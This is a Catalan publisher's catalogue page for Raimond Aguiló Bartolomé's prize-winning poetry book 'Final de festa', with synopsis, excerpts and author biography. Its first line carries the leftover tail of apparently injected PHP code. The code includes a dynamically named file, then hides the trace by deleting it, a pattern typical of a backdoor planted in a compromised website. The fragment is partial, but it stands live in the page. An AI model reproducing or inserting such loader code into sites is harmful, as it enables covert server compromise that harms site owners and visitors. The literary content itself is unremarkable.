");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Final de festa
Cercador d'Obres
ORDENAR:
Començar recerca

Final de festa

Aguiló Bartolomé, Raimond

Col·lecció:
Magatzem Can Toni
Tema:
Poesia
Pàgines:
76
PVP:
10.00
ISBN:
978-84-18441-34-9
Data d'Edició:
30/06/2021
XXXIII Premi Guillem Colom Ferrà de poesia Vall de Sóller 2020.
Sinopsi
54 poemes concebuts com si el fet de viure fos una descripció lírica d’una festa. Dividit en dues parts, La festa de viure i Final de festa. Hi trobareu també algun poema en homenatge a Damià Huguet.


Estem programats fins al final
i tenim una pila de deures per fer a casa”
-----------
“Demà... assegut a l’ampit de la finestra
recordaré com rutllava, d’aqueferada, la vida.
Tot serà imminent i gosaria dir que quasi perfecte.”


Llegir la Taula en PDF
Llegir un Poema en PDF

Raimond Aguiló Bartolomé
(Falset, Priorat 1950)
Resideix actualment a Reus. Treballà bona part de la seva vida en una entitat financera, però no va ésser fins al 2010, any en què es jubilà i abandonà la seva vida professional, que s’endinsà de ple en l’escriptura i començà a esbossar la seva trajectòria literària.
Obra de poesia publicada en els darrers deu anys:
Memòria urgent, Les cartes marcades,  La roca roja, Kalenda d’hivern,  Monòlegs fets a posta..., Magnòlies i vitralls,  Bumerang, Sobre el paper, La lleugeresa forana, Zona Wi-Fi, La pols de la calaixera, Batre l’aire, Brooklyn, potser i Cel d’octubre. 
La seva obra poètica li ha valgut diversos premis, entre els quals, el Premi Ventura Gassol; el Premi Marià Manent; el Premi Miquel Martí i Pol; el Premi Miquel Àngel Riera, el Premi Paco Mollà i el Premi Marc Granell.Recomanar
Comentar
Comentaris (0)